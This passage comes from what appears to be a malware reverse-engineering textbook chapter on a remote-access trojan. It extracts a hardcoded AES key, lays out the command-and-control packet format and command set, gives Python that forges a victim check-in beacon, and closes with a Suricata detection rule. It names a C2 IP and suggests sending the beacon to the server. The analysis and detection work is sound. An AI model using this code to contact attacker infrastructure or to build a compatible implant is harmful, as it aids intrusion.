aes_encrypt(payload, payload_len, DAT_00408040);    // key = DAT_00408040

Navigate to 0x00408040 in Ghidra: 32 bytes of data:

0x00408040  3A 7F B2 C1 44 E9 82 05 F6 3D A1 7C 08 2B E4 9D
0x00408050  17 6A F5 0C 9B 48 D3 2E 6F A2 8C 51 B3 04 CE 7A
← This is the 32-byte AES-256 key hardcoded in the binary

Python: emulate the C2 check-in with the extracted key:

import struct
from Crypto.Cipher import AES    # provided by the pycryptodome package

AES_KEY = bytes.fromhex("3a7fb2c144e98205f63da17c082be49d176af50c9b48d32e6fa28c51b304ce7a")
MAGIC = 0xDEADBEEF

def build_checkin(victim_id: str) -> bytes:
    # Simplified check-in: only the victim_id field, padded or truncated to one 16-byte AES block
    payload = victim_id.encode()[:16].ljust(16, b'\x00')
    # The all-zero IV is an assumption; confirm the IV handling inside aes_encrypt
    cipher = AES.new(AES_KEY, AES.MODE_CBC, iv=b'\x00'*16)
    enc = cipher.encrypt(payload)
    # magic + cmd=0x00 + len + data
    return struct.pack('<IBI', MAGIC, 0x00, len(enc)) + enc

pkt = build_checkin("DESKTOP-VICTIM1")
print("Emulated beacon:", pkt.hex())
# Can now send to C2 server to test response: confirms protocol understanding

Documenting the Protocol Structure

Protocol Documentation
Structured packet format derived from reverse engineering parse_c2_response

C2 Packet Format (from reversing parse_c2_response):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Offset  Size  Field     Value / Notes
0x00    4     magic     0xDEADBEEF (LE), always present, identifies protocol
0x04    1     cmd_id    0x00=noop, 0x01=shell, 0x02=upload, 0x03=download,
                        0x04=screenshot, 0x05=keylog_start, 0xFF=uninstall
0x05    4     data_len  Length of data payload in bytes (LE uint32)
0x09    N     data      AES-256-CBC encrypted payload (key: hardcoded at 0x408040)

Check-in packet (client → server, cmd_id=0x00):
  data = AES_encrypt(victim_id[16] + os_version[32] + username[32] + hostname[16])

Shell command response (server → client, cmd_id=0x01):
  data = AES_encrypt(command_string, null-terminated)

Total header overhead: 9 bytes. Min packet size: 9 bytes (empty payload).
Beacon interval: 60s ± 5s jitter (observed in Sleep() call in beacon_loop)
C2 transport: HTTPS to hardcoded IP 185.220.101.45:443 (no domain used)
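The check-in plaintext documented above is four fixed-width fields totalling 96 bytes, which is a whole number of 16-byte AES blocks. A minimal sketch of packing and unpacking that layout follows; NUL padding and ASCII encoding are assumptions of this example, and the function names are hypothetical. Encryption is left out so the layout can be checked on its own.

```python
import struct

# victim_id[16] + os_version[32] + username[32] + hostname[16] = 96 bytes
CHECKIN = struct.Struct("<16s32s32s16s")
FIELDS = ("victim_id", "os_version", "username", "hostname")


def pack_checkin(victim_id, os_version, username, hostname):
    """Build the 96-byte check-in plaintext; struct pads short fields with NUL bytes."""
    values = (victim_id, os_version, username, hostname)
    return CHECKIN.pack(*(v.encode("ascii") for v in values))


def unpack_checkin(plaintext):
    """Split a decrypted check-in body back into named, NUL-stripped fields."""
    raw = CHECKIN.unpack(plaintext)
    return {name: field.split(b"\x00", 1)[0].decode("ascii")
            for name, field in zip(FIELDS, raw)}


body = pack_checkin("DESKTOP-VICTIM1", "Windows 10", "alice", "DESKTOP-VICTIM1")
print(len(body), unpack_checkin(body))
```

Applied to decrypted capture data, unpack_checkin turns each check-in into a victim record, which helps when scoping how many hosts have beaconed.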

Writing a Suricata Rule from the Reversed Protocol

Suricata Rule: detecting the C2 magic bytes at TCP payload offset 0

# Magic bytes 0xDEADBEEF at TCP payload offset 0 → custom C2 protocol
# content + depth:4   → magic at offset 0 (little-endian, so EF BE AD DE on the wire)
# byte_test:1,<,6,4   → cmd_id byte at offset 4 must be < 0x06
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE CustomRAT C2 Check-In Magic Bytes"; \
    flow:established,to_server; \
    content:"|EF BE AD DE|"; depth:4; \
    byte_test:1,<,6,4; \
    threshold:type limit, track by_src, count 1, seconds 60; \
    classtype:trojan-activity; \
    sid:9000100; rev:1;)
# This rule detects the C2 protocol regardless of which IP/domain the C2 moves to,
# because it matches the protocol structure, not infrastructure IOCs.
# It assumes the sensor sees the packet in cleartext at the start of the TCP payload.
# Where the packet travels inside an HTTP POST body or under TLS, match on the HTTP
# request body buffer or inspect the traffic after TLS decryption instead.
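Before deploying a signature like this, it can help to check its matching logic against payloads extracted from a capture. The function below is a small sketch that mirrors the two payload conditions of the rule (magic at offset 0, command byte below 0x06 at offset 4). It does not replace testing the rule in Suricata itself, and the name matches_c2_rule is hypothetical.

```python
MAGIC_ON_WIRE = bytes.fromhex("efbeadde")  # 0xDEADBEEF in little-endian byte order


def matches_c2_rule(payload):
    """Return True when a payload satisfies both byte conditions of the rule."""
    if len(payload) < 5:
        return False
    return payload[:4] == MAGIC_ON_WIRE and payload[4] < 0x06


# Check-in header (cmd_id 0x00, 16-byte body) should match; other traffic should not.
checkin = MAGIC_ON_WIRE + b"\x00" + (16).to_bytes(4, "little") + b"\x00" * 16
print(matches_c2_rule(checkin), matches_c2_rule(b"GET / HTTP/1.1\r\n"))
```

Running this over benign payloads from your own network gives a rough early read on false positives for a pattern as short as five bytes.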

The Complete RE Workflow — End to End

This chapter covers the final stages of the reverse engineering pipeline. The list below places them in context as a summary of the full workflow Book 2 has covered, in the order you would normally apply it to a sample:

Unpack (Ch. 4) — identify the packer, find the OEP with the ESP trick, dump with Scylla
Deobfuscate (Ch. 5) — identify and script the XOR decryption routine; defeat control flow obfuscation
Resolve imports (Ch. 6) — identify API hashing scheme, build lookup table, annotate Ghidra call sites
Bypass anti-analysis (Ch. 7–8) — configure ScyllaHide, fix the VM baseline, patch remaining checks
Disassemble and annotate (Ch. 2–3) — iterative renaming from known API calls outward; IDA graph for complex functions; x64dbg to fill in dynamic values
Characterise the payload (Ch. 9–11) — shellcode bootstrap if applicable; identify cryptographic constants; understand the key architecture
Reverse the protocol (this chapter) — find communication function, parse the format, extract keys, emulate in Python
Produce detection artefacts — YARA rule from static indicators, Sigma rule from behavioural indicators, Suricata rule from protocol structure
Report — ATT&CK technique map, capability summary, IOC list, detection coverage assessment

Key Takeaways — Chapter 12

Working backward from network API imports (HttpSendRequestA, InternetOpenA) to their call sites in Ghidra leads directly to the C2 communication function. Once imports are resolved (Ch. 6), this is usually the fastest path to the most important function
The command dispatch switch statement reveals the implant's full command set — every case is a capability; naming each handler function turns the switch into a complete capability inventory
Hardcoded AES session keys in the binary can be extracted and used to decrypt traffic captures — even without the C2 server, captured traffic between the implant and server becomes readable
Protocol-level Suricata rules detect the C2 regardless of infrastructure rotation — a magic byte match at a fixed offset in the TCP payload is a stronger long-term indicator than a domain or IP that will be rotated in days
Emulating the C2 protocol in Python confirms your understanding is correct — if your emulated packet generates a valid server response, the protocol reverse engineering is accurate; this is the verification step that transforms analysis into confirmed knowledge